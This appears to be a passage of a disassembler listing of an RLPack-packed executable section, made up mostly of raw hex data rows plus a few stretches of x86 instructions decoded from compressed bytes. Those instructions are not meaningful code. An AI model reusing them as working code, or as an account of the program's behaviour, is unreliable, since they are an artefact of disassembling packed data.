dd 0D9DF0BCBh, 0CDDA0Ch, 0D8BF6BECh, 9D9BC40Eh, 405F0200h
dd 6C4E921Ch, 5D600742h, 41989375h, 0E85794F7h, 0D900813Ch
dd 0FF365148h, 0F05D684h, 0B6B09E97h, 11880313h, 0BA98550Dh
dd 477FE754h, 0F877681Ch, 125A1D40h, 0F3019D4h, 5F41F28Ch
dd 7E7BE400h, 680E5390h, 0C04089DCh, 16DB2684h, 0ACB40043h
dd 0C782C13Fh, 96000769h, 278E887Ch, 0D95084h, 4289041Dh
dd 3864829h, 3A824F07h, 0A0BF168Dh, 9FA228Ch, 41E200B3h
dd 0E4C0FCEDh, 4E5073D7h, 130754EBh, 5ACB6C5Bh, 0B9B618D3h
dd 0C8C83627h, 95D900BCh, 75A96BEFh, 90077779h, 0C63E98A8h
dd 252C7620h, 828B006Ah, 133D3BA9h, 0B8013C86h, 91A1F2AFh
dd 0FE702F7Ch, 0E5490032h, 0F9DA57C1h, 0A8700478h, 8563CC00h
dd 0EC0FF8E6h, 871E072Dh, 0D0CBF6B3h, 0B215F279h, 3A056B00h
dd 8F7330BEh, 2F31004Eh, 7E463352h, 0DB7B8737h, 8CB2C00h
dd 6040A0FDh, 0D9590015h, 0A14DBC46h, 480074C7h, 0B1250F7Eh
dd 1C7AFE2Dh, 815E432Ah, 27EB96C5h, 63488101h, 0F6B224D3h
dd 3D41970h, 3DCCB0C8h, 0D790E192h, 3200750Bh, 582CB90Eh
dd 2E4E0222h, 7FEE6B6h, 0B7BEDF39h, 6CD302EBh, 0D511A660h
dd 218B8400h, 71DA8352h, 99420059h, 0AE081450h, 0DC003A0Ah
dd 0F3781164h, 4B01F5h, 0C8DFB99Fh, 3ADD83FCh, 0EF6EF81Ch
dd 917440C0h, 283FD877h, 0BB0A20h, 13EC08FEh, 0A15A45B2h
dd 9C6383Eh, 80263F8Bh, 0ABF8DDF7h, 5DE0C7h, 47B192A7h
dd 8A3E4FCBh, 99E98F00h, 31D4AC44h, 0CA3B00B7h, 0F893947Ch
dd 0E4392F03h, 16E3260Dh, 9B97973Fh, 0EEDD05EFh, 9018C75Eh
dd 418EF632h, 73A805Ch, 0CB65DEFh, 0E3461CD1h, 7B53BF0h
dd 0EC30C2F1h, 9DF33065h, 70001971h, 4786D7ABh, 0AC8195h
dd 401DCB1Ch, 46B46534h, 0A8608216h, 317F1500h, 1880F193h
dd 0D6FF91E2h, 0FD7027F5h, 0A037AF07h, 5DD0E514h, 77E7AC59h
dd 812F00E6h, 0FBFAA1Dh, 0D600F187h, 7657ABBDh, 8859D9h
dd 0B5479584h, 7494E39Fh, 981AE900h, 5F783AFAh, 0F84F0071h
dd 0EE73D8AEh, 0CF001E51h, 499F4C56h, 3B07CE8Fh, 0CD006809h
dd 16C4E1D6h, 0AF00FBB5h, 0E8C091BAh, 1AD61B2h, 9C212FDFh
dd 3086DC47h, 6F3E9A4Ch, 0D2F90059h, 834190E0h, 2E6400F1h
dd 0E6D3F346h, 0CA1E72B6h, 9C4228CBh, 608C4117h, 3BCCA1h
dd 4955BC56h, 1E07F1C6h, 0A1373200h, 0C28DAFDAh, 0A9DE0012h
dd 27F49733h, 0C500E3CBh, 33BD76Bh, 9F9007h, 0ED20DAD8h
dd 36C905E5h, 0E8008C71h, 4A43FF78h, 0CD2DA7h, 0ACD3B428h
dd 3CD52E71h, 0CA1E6707h, 4B0A8D0h, 0B5FFEE27h, 0B0AEC607h
dd 0FCEB10F0h, 6E070EEAh, 0E76F36B8h, 0B04FC983h, 3FA2E2D9h
dd 0E8805A04h, 0B3C6C041h, 2A3FEEEAh, 941E9305h, 1BE8A00h
dd 0FCE6FF74h, 0D203004Bh, 442DB2ECh, 8C1E669Eh, 0E5C7E2C9h
dd 4700DF14h, 0A00C80h, 0EB657B76h, 4B5D0962h, 38DE8F00h
dd 0C69CB08Dh, 56FE1EE2h, 0FCE38083h, 0A56C4DECh, 82B87F00h
dd 13814979h, 9DA7002Eh, 33C91BCBh, 5000DCD9h, 701A210Dh
dd 71E4F27h, 2A444D3Fh, 0A60701D6h, 38ABF815h, 0EE171C2Ch
dd 0D783D41Eh, 0C3E006AEh, 5E89A88Ah, 0F84800B2h, 96701159h
dd 99008CD4h, 0C12F124h, 58281Ch, 6682D080h, 0BF94133Fh
dd 34112E00h, 0CCD464A1h, 0A8D100B4h, 52E7EFB2h, 0EC0092DBh
dd 3E20592Ch, 1C62237Ch, 8BCC73h, 1D50D9C5h, 0B03BEC34h
dd 413D0056h, 0BBDC3EB8h, 453700A9h, 621911E1h, 3C032829h
dd 9D434951h, 0B00EC0A6h, 41B1003Eh, 0F5EAC34Eh, 900033A7h
dd 920DC142h, 0FA3BADEh, 586E6A59h, 34CD53E0h, 0A20052CCh
dd 0D46F3151h, 75FD87h, 49B05EFBh, 0C7537BD1h, 45B6C800h
dd 0F496262Ch, 0EF0C00CCh, 5208AA07h, 3C008E68h, 1AFCDAE7h
dd 472CCDh, 0B9A82181h, 448AB333h, 82E2800h, 731B4596h
dd 58C500B4h, 534E83E8h
dd 0AA00ACE6h, 7A9D2507h, 8726C2h, 454AD964h, 54DA52C3h
dd 4D8C5B00h, 867C39C7h, 0C96600ADh, 0E5C0A1ACh, 0A8007DBAh
dd 3CA9FE9Ah, 7E33F9h, 0E7072F83h, 24945059h, 7721F801h
dd 6296FCD1h, 17A3F4h, 0D09FA486h, 24A7C8A6h, 80677F3Dh
dd 98EBCF32h, 0F2ABDD41h, 11DF057h, 0ED8D458Bh, 0F7429644h
dd 5EE0BEE0h, 19B0FF00h, 46432F15h, 135A001Fh, 1C628511h
dd 5DF00809h, 56D60E09h, 0B7FB8039h, 2B7F8Fh, 2703DB22h
dd 90C64B61h, 43FC4900h, 0C675E5Ah, 9A8C0062h, 7352E945h
dd 3A01EA37h, 0B944ABA7h, 3D709647h, 10EB00B2h, 0C91CDB9Fh
dd 5200AEE9h, 0C21A1331h, 75325DACh, 1FC6FAAFh, 0C0FE1197h
dd 0ED456725h, 301DE57h, 9629B24Eh, 0A6E08556h, 9730019Dh
dd 0F743598Eh, 642630D6h, 0B3DD6C00h, 0F9431C3h, 71EF485Ch
dd 0DFF58201h, 0C4367B67h, 5E000534h, 724B39DDh, 0D78A96h
dd 0FCD45AA2h, 0B50E014h, 76AC7700h, 0CBB9195h, 1C1800BAh
dd 746C497Ch, 9300E19Eh, 2513F663h, 1606EFA3h, 143E22A4h
dd 0A500C69Ah, 0E30BE97Bh, 6D00EBBDh, 0C6BC01Dh, 409248h
dd 68B11A09h, 36C297BAh, 8B917F00h, 10395B90h, 5FA8073Ah
dd 607CCDA9h, 677A858Ah, 7050D600h, 62B7F898h, 0A62C3AF7h
dd 54452183h, 0B1D0A7DDh, 47F60A94h, 961DCC1Fh, 9D7035C0h
dd 0F4DE4Fh, 4C41CF18h, 0E97C8FB3h, 3C3B9800h, 80431FDCh
dd 5C5800D3h, 275D93F8h, 0CA3DBF77h, 0F92B00FDh, 9DFB1931h
dd 0B1FAA4h, 30BA9FB8h, 0C8CB1429h, 3B51D207h, 28B04682h
dd 1ED50Ah, 0CAE0A5F5h, 97E6634Eh, 0D88EDD0Bh, 8C40806Fh
dd 5C74FB62h, 2E004955h, 4D884B2Ch, 6AF2CD4Ah, 62AFFC00h
dd 0B401AA2h, 0CEBD1C44h, 3F5E80A3h, 1F559C30h, 0BC205700h
dd 0B340993Bh, 39B00DFh, 8C4F77D6h, 43073309h, 138DC7C3h
dd 5944B7h, 4CEA0B70h, 304B0066h, 277C4F2Eh, 210013A4h
dd 3A16469h, 1F18EDh, 557215D9h, 0D5E3EEB5h, 84BFB607h
dd 0ABD0D7D4h, 0C21D10h, 0FEEA3A33h, 54A2B4CDh, 72C8D100h
dd 0B7102CFBh, 0BCC600F4h, 708BA03Fh, 0D20F9B20h, 0CE8A3B53h
dd 0AD47A713h, 64437890h, 0CD4D3918h, 23766680h, 0E2D6ABE0h
dd 0C1121100h, 35CA612Fh, 6E6800BFh, 0C9634145h, 0D41D8A3Ch
dd 2FCBC93h, 0CC1304C0h, 9A3E40DFh, 577F00B8h, 0F4A6F8EBh
dd 740E687Ch, 38F5F916h, 2C385Ah, 0C5485C80h, 0E3FC9AC2h
dd 2AFDF81Eh, 370BE8C0h, 8725C4h, 4794C582h, 0D5190479h
dd 0B5E55E1Ch, 25AB1E80h, 0C022907Ch, 31B4BD66h, 0AF0005A5h
dd 0D495C99h, 7DA43503h, 0B8DB1DFDh, 5F93C243h, 0A5809D24h
dd 0E4049A3Ch, 708C4C00h, 17307B5Bh, 72A703C0h, 0C973E3D7h
dd 0A61C04D0h, 600D4E4h, 45923AAFh, 48814AD1h, 0F100428Ah
dd 71E2F641h, 760B46B0h, 8011FAA8h, 0C98B14ADh, 2D423AA7h
dd 0FF678880h, 2CBAEC03h, 56B5C71Dh, 9DDCB68Fh, 0E20687C0h
dd 35D099h, 0B95218D1h, 923E9B70h, 0E0BDD00h, 543C25D8h
dd 2267389h, 446E8C06h, 0C0FFD56Ch, 3BDF2D98h, 2A8011BCh
dd 709CADB7h, 0DE00F1A3h, 32A7496Fh, 3D8420h, 16C5F95Dh
dd 8D4FC8E3h, 7B980600h, 0F4EF2DD4h, 0D5CA3A76h, 5FAFE400h
dd 0FCB6D753h, 260055F6h, 0E97F9B12h, 0F2875Eh, 19C3F021h
dd 606789E4h, 0EF4AFD00h, 0C9FED805h, 932E3E8Dh, 80815200h
dd 59DF8E73h, 57FF0803h, 0A0A222BFh, 5D5111h, 0F7049DAEh
dd 19965498h, 9E3D1C0Eh, 887C40C2h, 77A4FFAh, 0A7FD159Ah
dd 0D18FC0E8h, 83021390h, 8C27CF58h, 0B2A0E004h, 650001Eh
dd 24DEBE92h, 7E0EA174h, 3F2FA9CCh, 60E0CFCFh, 7856314Dh
dd 5AB8DAh, 1B62E9B5h, 0D61877E3h, 3E5B4600h, 0CA894E8Ah
dd 0CAC0070h, 367A1239h, 630055A8h, 19850469h, 38540826h
dd 300097A9h, 0ED173379h, 0B958CA31h, 0D02F006Dh, 0CFBFECBEh
dd 38041DBDh, 0F172C1FDh, 0FC8F5D58h, 0C00069CBh, 0B8F44111h
dd 0C22845h, 61A51DBCh, 4652E665h, 2DEFFB00h, 1FE72B9Dh
dd 996E073Ah, 8039A8A0h, 0BDEA8F9Ah, 251E2E00h, 298D9006h
dd 8B571C7Dh, 5A098082h, 0AAAE85D1h, 6D6BFB00h, 37CF7535h
dd 2E235C8Fh, 9AB44C00h, 9BF64FF3h, 7F84E00h, 0C6E5FD7Fh
dd 79BB000Dh, 1AB82FBAh, 11009DAAh, 0E10A339Ch, 3C323E50h
dd 7B80018Dh, 7C39B26h, 810B2902h, 154357Dh, 0B208BCD5h
dd 87D0DFF5h, 5FFE0117h, 35F8D5ECh, 8FE82018h, 10762101h
dd 6636A223h, 82A6E0D2h, 0E57807F0h, 7043A30Ch, 485F5A75h
dd 0EBD3B80Fh, 3D29A04Eh, 1DC091E7h, 39779878h, 58657080h
dd 5A139CFAh, 0DBB14D00h, 0B5261887h, 0A3000D6h, 0C5B85838h
dd 0E00F6EFh, 7CDC9BBDh, 5AB154h, 941B884Ah, 93094445h
dd 97E88200h, 0BEA052F4h, 26170023h, 0D3F37DE4h, 4500A604h
dd 4BC9EC58h, 4BFBE57h, 0F2102735h, 2B678064h, 833A60ABh
dd 0BC9C8037h, 0D4C81299h, 39B900DBh, 517B8036h, 5203538Ah
dd 7FBD6B6Dh, 3EDC8D9h, 0CC99002Dh, 0B767E2B3h, 6600BF2Bh
dd 0D56F6C97h, 5E7617h, 0C481A68Fh, 0DE3ADC37h, 692399A0h
dd 78C15303h, 0F11AAA3h, 31FEF1F6h, 0D8184C9h, 0DC2ACA94h
dd 800887Bh, 166A8399h, 0EBDF7CEh, 0EA2630E0h, 0BA1B0B60h
dd 3D025447h, 1F14FB7Eh, 2D9B800Ch, 323AB3h, 0E3C2FDDBh
dd 779F68DCh, 0DF359600h, 0B7C58926h, 25F60023h, 3D184394h
dd 0B20E842Eh, 603540A2h, 529E948h, 52790621h, 2A1E4BCDh
dd 8C3D19E4h, 0A33809E3h, 2EE180E6h, 571667h, 0C37941F5h
dd 8F68AAB8h, 0C0941C1Dh, 816506C0h, 15F1470h, 3FE67463h
dd 70EA92DDh, 0E41E3AEEh, 0FB400643h, 63207CD2h, 0CE830784h
dd 80B1AF33h, 7390115Fh, 0BECAFF03h, 0E7B98F69h, 640D8DD0h
dd 94710EBCh, 0CA80D84Fh, 0CB3C60F8h, 70DDFE2Eh, 1BF24001h
dd 89D4F374h, 0C47102E6h, 3DF7B346h, 2055C241h, 6F00EFB5h
dd 201B77CBh, 25FEBFh, 7ED6855Dh, 87F72B62h, 0BCF2010Bh
dd 0C86F07FAh, 0D8FE33B0h, 0E8DB01E2h, 0FC4F9ADAh, 0D13EE0C4h
dd 31ACCC00h, 0F7A19B52h, 9EB906BAh, 501B2D88h, 3A27DC00h
dd 75F465FBh, 68DE00D8h, 58C24CDAh, 883A6CCDh, 7B458743h
dd 0FD00DB0Ah, 0BB379F3h, 33C03775h, 654DF000h, 0C6000A0Bh
dd 451BD5A2h, 0EFB46Bh, 0D9816001h, 48B72FFh, 95469B00h
dd 92AB19C8h, 823A1C67h, 3E740017h, 3DF947Ch, 5F01AAA0h
dd 9BA83700h, 2D708462h, 16F50035h, 80E91CEEh, 2300202Bh
dd 62974405h, 63CC7ACh, 8E281FBFh, 98009489h, 2D4B51E9h
dd 3BC4428Ah, 6380E2AAh, 6EFEE4CCh, 6F03F3A9h, 0DDB98487h
dd 0F0D8A00Ah, 36D30030h, 2B082C1Eh, 26488877h, 0F8FF006Ah
dd 0E8144C8Ah, 0F65903Ah, 71A3F3D7h, 0C6C05A2Eh, 94D63622h
dd 6CB56D01h, 4D0DA2CEh, 1FBCCFE4h, 0C1357150h, 8EFFDA4Ch
dd 81A8EF95h, 5300020Dh, 9B36A134h, 3C62224Ah, 7F0575h
dd 2728D848h, 0EFB01657h, 61E7A800h, 841285BBh, 0C3ED031Ch
dd 902B7A86h, 3433BE0h, 0DF0D2000h, 0E4972A73h, 0AA8B0023h
dd 0B7C1F0A3h, 57FCE1BDh, 0FC4D433Dh, 0C937781Ch, 2A2F2404h
dd 8BE9C0BFh, 0E300CC6Ch, 46A92348h, 1EA77191h, 0C0AEB413h
dd 0FE7DD28Dh, 0F73B3782h, 0D8CE0138h, 8997E5EEh, 7036E1CCh
dd 2B815h, 0F99DF294h, 6004D496h, 2002B5F2h, 3280E64h
dd 0C8C6E06Ch, 0A46200CBh
dd 9C5B3AFBh, 3C00B5E7h, 0A8D4922Ch, 6E3BB1h, 85E2DD0Bh
dd 259027A6h, 0EAEF38h, 6CBCC0Fh, 0E68EFEFDh, 925300F6h
dd 0EA87E76h, 4E03AB9Ch, 6CE65437h, 2DB5883Bh, 0E4BF07F9h
dd 0C00E6606h, 9617B6A6h, 0A782FF00h, 0BEC05BC2h, 886E3818h
dd 0B462DC02h, 0BE407BF4h, 170043E5h, 0AC4583Ah, 950850h
dd 0B73D6E4Ch, 4845F71Bh, 89070303h, 0B0A294EFh, 1D9115h
dd 6F44B1CCh, 5BAE4E1Eh, 0A9A05100h, 12DD28Bh, 0ACE43Fh
dd 0F2460EB5h, 34C798C4h, 510092B8h, 0DE7EB8C6h, 1DD7B977h
dd 47ED581Bh, 700CF3AEh, 5F6EF7C0h, 1F66403Dh, 6BA449B0h
dd 8F1E0D03h, 0FA3B90C4h, 0D92B0F70h, 132096A7h, 61F62517h
dd 16AE4406h, 0D6B59Fh, 7D5C607Bh, 29C876E9h, 0CBD26A03h
dd 884D74A4h, 142E7EDh, 0B3C7CA9Bh, 0D4F63FACh, 0CE00640Bh
dd 437E679Fh, 0D0DAB5h, 65B3096Ah, 0ECD21651h, 0CD00387Fh
dd 0D623280Dh, 3A76DF27h, 0FB80C4B0h, 77572650h, 20024D3h
dd 2BABA970h, 35BDDDh, 23E7DB93h, 0BA0D3EC0h, 0EA490300h
dd 0C38968A3h, 0E02D00A5h, 92E52052h, 1C006B08h, 0E9591374h
dd 0E9F9Ch, 0BF9EF1DCh, 2885FA01h, 88546D00h, 5FD7D135h
dd 53ED0334h, 56EEBA1Fh, 6C0C94B0h, 35009598h, 16BE0FA8h
dd 530E4Ah, 0F2C0B4CBh, 50590538h, 641FE100h, 8CA15C92h
dd 0C23B000Bh, 7B42CC98h, 8E00E9B6h, 5DEBC5A3h, 5CCE066Dh
dd 0C100E0D4h, 5C0C0E23h, 8D075733h, 0E919BA8Fh, 0CC1F9E00h
dd 672B3004h, 0F4CB6E18h, 8795BD00h, 37311615h, 48DE00C3h
dd 0FFAB6443h, 0D900200Ch, 0F31922E2h, 9012F8h, 7FF9FCB5h
dd 99853184h, 97DA0302h, 609E114Eh, 0E89AE574h, 60AF7015h
dd 0B0011470h, 0B400354Dh, 11253D9Fh, 3D4FE08Dh, 1600E466h
dd 0BFAA537Eh, 0C0009655h, 28671D8Ah, 12C6FB36h, 7CFB650h
dd 41DBB056h, 0F80BDAF8h, 8FF8E4D5h, 0FBD0E600h, 0A5F71E29h
dd 0E99C0099h, 0C6E762A7h, 500085F5h, 39744B33h, 0AA3DBBh
dd 9FF2B22Eh, 0A2AF3FB7h, 0FA36F600h, 3AC4873Bh, 728200A6h
dd 0D964DBC3h, 341FC252h, 764033B6h, 0A34E3FCBh, 0B5A4C0D2h
dd 0FA440B02h, 1109B4EEh, 805C7C43h, 523F330Fh, 7A7B01A4h
dd 892495AEh, 0DB6BE812h, 7F700A00h, 27251CFBh, 8B4B0FE7h
dd 53A0198Eh, 73F7ED7Ah, 5E703C0Bh, 0D5C5001Ch, 0EA0159Dh
dd 0F1645962h, 0ED82003Ch, 0BE465F7Dh, 0C7C960FDh, 4FF86D01h
dd 173A39E0h, 0D8F7B621h, 7F31D2Eh, 78D9118Ch, 452590C5h
dd 0D000232Dh, 8FF01C55h, 39C64489h, 1D97F204h, 0F78BF04Eh
dd 834C7F04h, 0BE8763AEh, 1F5152C0h, 13F27990h, 48BACEh
dd 0ABC456F7h, 0B23BE072h, 8100774Eh, 0BFEE1BA2h, 0E897CB17h
dd 32CC000Ch, 75EC6787h, 0BC009D60h, 0C53F4CA9h, 3064F39h
dd 97AA0B5Ah, 0C790461Eh, 51EE18Bh, 0FCC3AFEAh, 8094DEA4h
dd 29CE23h, 90E0965Eh, 16E77295h, 78101E2Dh, 0CB22003Bh
dd 88524670h, 1217BC86h, 0A0007C6Dh, 0C83C3A6Fh, 0B1C6008Bh
dd 0A280FD69h, 0AB007F09h, 5E0712C1h, 0ED8F847Ch, 7B514BF4h
dd 4A7BFCh, 0BF2B731Ah, 32B21118h, 0DBBBD00h, 8A8E2E09h
dd 96E1079Eh, 0F00FC98Ch, 367D92CBh, 772FFD00h, 0FCFADF17h
dd 0E64503E4h, 300E79B3h, 9ECA8BD0h, 724DE300h, 0A5E08604h
dd 705004C2h, 802980DCh, 6C7302B5h, 48BA3A3Ah, 85B00DBh
dd 573814FAh, 0F4A1002Bh, 757CCCA6h, 0E800EF4Fh, 79FCBDFFh
dd 0BFE7E6h, 544E4D51h, 45CAA3D5h, 0E80067B0h, 0D34CB033h
dd 3F98CD9Fh, 6680DEBCh, 147BAA40h, 0B800D513h, 0D8622786h
dd 0CCB489h, 79547236h, 8284E61Ah, 991DF200h, 0C5460BA6h
dd 6B300069h, 0D9C01E88h, 1800B18Fh, 90D764E1h, 7916DEE6h
dd 0D4300046h, 37ED2AFDh, 2514F97Dh, 0D339C2h, 1EB64D13h
dd 567604h, 0D7E77A96h, 4833C30Dh, 7DCDEC00h, 4638D4BBh
dd 0E4493ACFh, 81207380h, 66D91968h, 0A0DB2E01h, 0FFF41FF2h
dd 30A1E480h, 0AD2CE3C7h, 7E009578h, 41AEBA90h, 789134Fh
dd 0EACE8714h, 795B1058h, 36008B6Bh, 0EA0BBB2h, 18E1A75h
dd 34EF4976h, 0D98767D7h, 61F53066h, 37446D00h, 0CB46F9Bh
dd 23CE012Dh, 6BFB265Ah, 0C4B23056h, 895710Fh, 0C2700222h
dd 88ED87F6h, 0E899CFB3h, 7393E3h, 0F89110F5h, 9B828B07h
dd 0B3AB1200h, 6E1B7FFBh, 0B41242Dh, 468506D5h, 63029E3Fh
dd 0F8EEABF6h, 352F60AAh, 0BC141DE6h, 0B4A0007Eh, 7405BA50h
dd 2C0BCE71h, 0FD7B3C4h, 1B12C0F2h, 14374A7Eh, 0ECC370C0h
dd 9B33FD00h, 0EFFA2D57h, 80664339h, 0E25698ACh, 378F11Bh
dd 2AAFD638h, 39DBD05Ch, 52DA087h, 0F500709Bh, 301DD291h
dd 79523ADh, 3568649h, 6CEC102Eh, 0CA3FA9D5h, 3EB7802Fh
dd 0AE932CD8h, 4F9901EEh, 8F3B7FBDh, 5E0BF0AFh, 56199716h
dd 58023100h, 57866Eh, 44E6994Dh, 0C0B054E0h, 6B5E3B00h
dd 0BCE9B736h, 958100F6h, 27E5E3DCh, 0DD1F2DCAh, 0D6814608h
dd 0F914433Eh, 7E2FB6F0h, 0FE10326h, 776E979Ch, 8F047888h
dd 0BFCB2100h, 0C7D52DBh, 2E8200A3h, 0D36F8590h, 5617DF1Fh
dd 8100F35Ah, 0CC6DC87h, 89E400CDh, 0E34BF7D9h, 0E00BF0Fh
dd 0AE334C15h, 0AF62EBh, 0A838FCE2h, 9F8252Ch, 86137301h
dd 371A9ABFh, 923CF0h, 0A106CF5Bh, 23C0D3DCh, 0FEC8200h
dd 6F96BCA5h, 147700DBh, 0F9AF4959h, 0D5001786h, 0E0247375h
dd 27C204h, 7F3B7DEEh, 0A31A3DBCh, 2D41FB01h, 0EF67A836h
dd 8211F340h, 89920029h, 0F504C339h, 7B00B10Eh, 984D491Eh
dd 0C59484h, 16584F33h, 9E0B2BADh, 816D3900h, 0E730660Eh
dd 0EBFF07B0h, 0A546320h, 30F701h, 0
dd 0E06970A2h, 0A57F70A4h, 1070DE01h, 0FF080254h, 18F403CDh
dd 96241012h, 1482914h, 142C1410h, 102860B2h, 0B2143414h
dd 1410286Ch, 90B2143Ch, 44141028h, 28B4B214h, 144C1410h
dd 1028D4B2h, 0E1FF0123h, 2201CCD8h, 2A076007h, 1C54F2A3h
dd 0C1C081CEh, 3CB2DC22h, 8AFBE81Eh, 41C5CA00h, 0AE45889Bh
dd 872123Ah, 0E99200E1h, 0A07F730h
; ---------------------------------------------------------------------------
pop ds
push ebp
mov ebp, esp
inc eax
xor dword ptr [ebp+34h], 3Ch
inc ebp
or [ecx], al
cmp [eax-7], ecx ; CODE XREF: .RLPack:0042CEAA�j
cmp [ebp-10h], ah
loopwe near ptr loc_42CEA4+1
sal byte ptr [ebx], 0D2h
add [edx+53h], al
pop es
push esi
mov esi, [eax+0Ch]
push edi
add [ecx-26h], al
shl ebx, cl
sahf
xor [eax+edi*8], al
add [ebp+79h], bh
cli
add edi, esp ; CODE XREF: .RLPack:0042CED9�j
mov [ebp-2Ch], eax
add eax, [ebx]
enter 0FFFFC3B8h, 0A6h
push 4B3FE0F8h
add [edi+6], cl
jnz short near ptr loc_42CEC6+1
add eax, 1C8136h
mov byte ptr [ebp+0Bh], 3Eh
pop ds
pop ebp
ror dh, 1
cmp eax, 5500CC7Dh
call near ptr 0E5230EF8h
add byte ptr [eax], 0DCh
jz short near ptr loc_42CF28+1
or ecx, [ebx+0E0457h]
loc_42CEFD: ; CODE XREF: .RLPack:loc_42CEFD�j
jecxz short loc_42CEFD
rep stosd
aaa
mov edx, 3E00AC0Ch
push es
push 5
test [ecx-4], bh
pop es
add al, cl
call fword ptr [ecx-75h]
jnz short loc_42CF93
pusha
push ebp
add [edi+ecx], cl
mov dh, 36h
add eax, ecx
loop loc_42CF28
add [ebx], cl
setalc
push dword ptr [edi]
sub cl, [ecx+64h]
loc_42CF28: ; CODE XREF: .RLPack:0042CF1E�j
; .RLPack:0042CEF5�j
lock add [ebp-17h], dh
cmp [ebp+3Bh], ecx
sbb [edi-80h], dh
add [ebx], dh
rcr byte ptr [edi+5Eh], 5Bh
leave
retn 0F5h
; ---------------------------------------------------------------------------
dd 23A872B3h, 4DB1F09Bh, 5680F800h, 4E1C1ECh, 0ACB0003h
dd 3D8A3C8Dh, 10086B5h, 0C8241773h, 1D9B4D80h, 803A3012h
dd 0E6E0BACAh, 22008987h, 3E0F8B39h, 0FEE9DF0h, 0F1AF830Bh
dd 3C0C7563h, 0FD017FB8h, 0BE70C603h, 0F82BEEA8h, 530C7h
dd 37895303h
; ---------------------------------------------------------------------------
sub [eax+75h], ch
loc_42CF93: ; CODE XREF: .RLPack:0042CF13�j
cdq
add eax, 0CC23AA81h
lock add [ebx+4D2A5908h], al
aam 0
push es
jmp near ptr 0EFD9BE7Bh
; ---------------------------------------------------------------------------
dd 0A0EDC46h, 6042EC03h, 85F669F7h, 26A74814h, 7F87D00h
dd 0D80E8C8Dh, 161C6C01h, 0F7A08ACh, 0ED9FDCh, 2B7CF040h
dd 14B9E850h, 0C84C600h, 0F41C2C31h, 0F66500D1h, 750E0690h
dd 0E73D8108h, 0C8D8018h, 8E641767h, 22E204h, 40A694D8h
dd 1B88755Dh, 0E61EC176h, 81BC8EF3h, 738A8709h, 3AE8A21Fh
dd 81D800CEh, 853189D2h, 0CD000FFFh, 0EB8D8682h, 482919h
dd 8BC62B14h, 0CE60771Dh, 89D89C00h, 54188D0Eh, 3E010012h
dd 81286774h, 9DE678FAh, 19F37300h, 7061EB02h, 1F200608h
dd 94118591h, 0CE443600h, 1473123Eh, 621B0F2Ah, 9C00EBF0h
dd 0F89286Eh, 67846B01h, 0A89F7C32h, 1406FCh, 1D24ED92h
dd 55881C04h, 3CFE0B00h, 2B09A60Eh, 9AE90041h, 33322305h
dd 6D001F0Ah, 8BFA03FBh, 7123C13h, 0C182A206h, 40D197A1h
dd 0CA9C92EAh, 0B4C55B00h, 8DCFA654h, 8A940026h, 0FEAC4843h
dd 88770A46h, 0DD33F300h, 32E46A07h, 0CDC004Eh, 48300FE0h
dd 10F43778h, 67DB200h, 7EB9190h, 45C70028h, 9B3A688h
dd 0C10081ECh, 0E9D022C8h, 0C3A8F3h, 360AD9DBh, 0BC8D0657h
dd 55308A07h, 51105691h, 0C011C3D0h, 0B43439AAh, 0AB076A83h
dd 0F8F0B25Bh, 9A0FF270h, 42A200A1h, 0C7ECCC04h, 0C20050A6h
dd 908E348Dh, 538936h, 0E3A1A419h, 8CB726B6h, 55865800h
dd 73C60E43h, 3447747h, 2C4853BAh, 0E0C0EB03h, 891E86C0h
dd 84800F16h, 55423F51h, 7B480114h, 0F4A4C933h, 0C19DFC03h
dd 94C8D01h, 36F77E8Eh, 8AD854D1h, 110C031Fh, 3B8DE488h
dd 13E916B0h, 0C4295B00h, 9DC22B98h, 2A203E71h, 0ADE0700Fh
dd 0A5F222E0h, 60001082h, 0A71526FFh, 0E78A054h, 7A48EB32h
dd 0BA90EDE3h, 5C00AA93h, 55F21791h, 1CDCE749h, 40E65975h
dd 6B76FF62h, 4B000451h, 1E493C1Ah, 0FBFDE1h, 6A1D0B24h
dd 14D08AF8h, 0C7DA8407h, 9053236Eh, 0A011A355h, 2588F2h
dd 0A26F453h, 24ACE35Ch, 26D3100h, 0FF33080Bh, 4E7B63h
dd 0C281E921h, 0F2104565h, 89D68200h, 0A860BD11h, 61873EBFh
dd 71B82600h, 6634045Ch, 2802C400h, 65868CB0h, 1EEB0029h
dd 384ED62h, 0A63008C9h, 26E64E41h, 0F1D2005Fh, 0FB535DCDh
dd 220011D8h, 834701F4h, 7823BF7h, 0B49114A2h, 9A19A086h
dd 0C909C843h, 31B3489h, 0E8F31C45h, 36C7CB5h, 5C142EA4h
dd 36F802B1h, 0D2009001h, 0FA96E3FFh, 63EA95h, 3EC01750h
dd 0FE2BE6D3h, 0FBB80100h, 222C08B1h, 856E0115h, 676FB07Ah
dd 0EE4E3007h, 46056D00h, 7203EBD8h, 5978006Ah, 58B228FDh
dd 9C000491h, 1106C039h, 750C69BBh, 496E0015h, 0A012B793h
dd 9EEC5DA1h, 0D2162200h, 0AC1539B5h, 48A21C68h, 75080E9Dh
dd 0C0EA83C4h, 7090FA66h, 0FDA0D00h, 0E0D1D28Ch, 7FE6CAh
dd 1E326F9h, 2CB0C13h, 0C20E2C00h, 0F7DD8BEh, 0FBC71F58h
dd 70400061h, 800ABC8Fh, 1243EB00h, 7E04E983h, 0D1031C3Bh
dd 39DBC0E8h, 67271D7h, 0AB62900h, 7505968Eh, 8F8D07D0h
dd 0B04CD588h, 1DD104B8h, 9022D800h, 0B447671Ah, 7D320008h
dd 0E2844FE8h, 4D01B914h, 0E4151181h, 0A2E0DA0Eh, 0B298FFh
dd 0E972C112h, 4AD1D542h, 0E1046600h, 6EE3960Bh, 7C8D0009h
dd 9E0F013Fh, 7D002052h, 0D689439Ch, 110726h, 0D7DFF8E0h
dd 1710E54h, 3B02F400h, 213577DEh, 1C60030Dh, 0CB2B03CEh
dd 118ACF98h, 0F44A1F00h, 463E4488h, 74977641h, 899E1F09h
dd 5748087h, 7218513Bh, 0A0BAE503h, 0C0FD39B9h, 3DAE820Fh
dd 0C316E977h, 40E50E0Bh, 804B9AA4h, 7010F74Eh, 5328E62Ch
dd 4600B41Ch, 6A995704h, 0F7593E09h, 53CF900h, 68707C5Fh
dd 92104B3Bh, 1100B65Ah, 0E0F79993h, 0A1E27Dh, 42CEF0E7h
dd 27A4C3E4h, 94F40A1Ch, 48FB9600h, 30407E5h, 0FF026A50h
dd 1EF06157h, 0FC00388Eh, 3E3F7E8Dh, 0CAD053h, 9C63683h
dd 0F07D1AAEh, 0A1E83701h, 809A1C7Eh, 0B4B51FCh, 0C50811Eh
